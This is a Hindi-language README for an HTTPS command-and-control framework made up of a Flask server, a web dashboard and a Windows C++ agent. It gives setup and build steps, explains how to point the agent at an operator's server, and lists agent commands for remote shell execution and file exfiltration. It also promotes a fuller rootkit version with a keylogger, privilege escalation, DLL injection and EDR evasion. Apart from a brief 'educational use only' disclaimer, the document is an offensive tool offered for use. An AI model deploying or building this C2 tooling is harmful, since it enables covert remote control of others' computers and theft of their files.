
एन्क्रिप्टेड बीकन, वेब डैशबोर्ड और विंडोज एजेंट के साथ HTTPS C&C फ्रेमवर्क।

HTTPS कमांड और कंट्रोल इंफ्रास्ट्रक्चर जिसमें रिमोट विंडोज एजेंट प्रबंधन के लिए वेब डैशबोर्ड है।
⚠️ केवल शैक्षिक उपयोग - अवैध उपयोग आपकी जिम्मेदारी है।
सर्वर:
cd server
pip install flask
python c2_server.py
डैशबोर्ड तक पहुँचें: https://localhost:8443
क्लाइंट:
build.bat
अपना सर्वर IP सेट करने के लिए client/c2_client.cpp संपादित करें:
wstring c2ServerUrl = L"https://YOUR_SERVER_IP:8443";
एन्क्रिप्शन: XOR + Base64
कुंजी: Hostname + Username + "SecretKey2025"
ट्रांसपोर्ट: HTTPS (पोर्ट 8443)
Agent → POST /api/checkin → Server (get commands)
Agent → POST /api/result → Server (send results)
सर्वर: Python 3.9+, Flask
क्लाइंट: MinGW-w64 GCC 15.2+, Windows SDK, C++17
यह C2 फ्रेमवर्क XvX Usermode Rootkit प्रोजेक्ट से निकाला गया है। पूर्ण रूटकिट संस्करण में 15 से अधिक कमांड के साथ एक अधिक पूर्ण C2 शामिल है, जिसमें प्रक्रिया/फ़ाइल/रजिस्ट्री छिपाना, SYSTEM विशेषाधिकार वृद्धि, इंटरैक्टिव रिवर्स शेल, कीलॉगर कार्यक्षमता, DLL इंजेक्शन, और EDR चोरी तकनीक शामिल हैं। यह स्टैंडअलोन संस्करण शैक्षिक उद्देश्यों और कस्टम प्रोजेक्ट्स में आसान एकीकरण के लिए मुख्य C2 बुनियादी ढाँचा प्रदान करता है।
लेखक: 28zaakypro[@]proton[.]me
| कमांड | सिंटैक्स | विवरण |
|---|
shell | shell <cmd> | शेल कमांड निष्पादित करें |
exfil | exfil <path> | फ़ाइल एक्सफ़िल्ट्रेट करें (Base64) |
sleep | sleep <seconds> | बीकन अंतराल बदलें |
ping | ping | कनेक्टिविटी जांचें |
die | die | एजेंट समाप्त करें |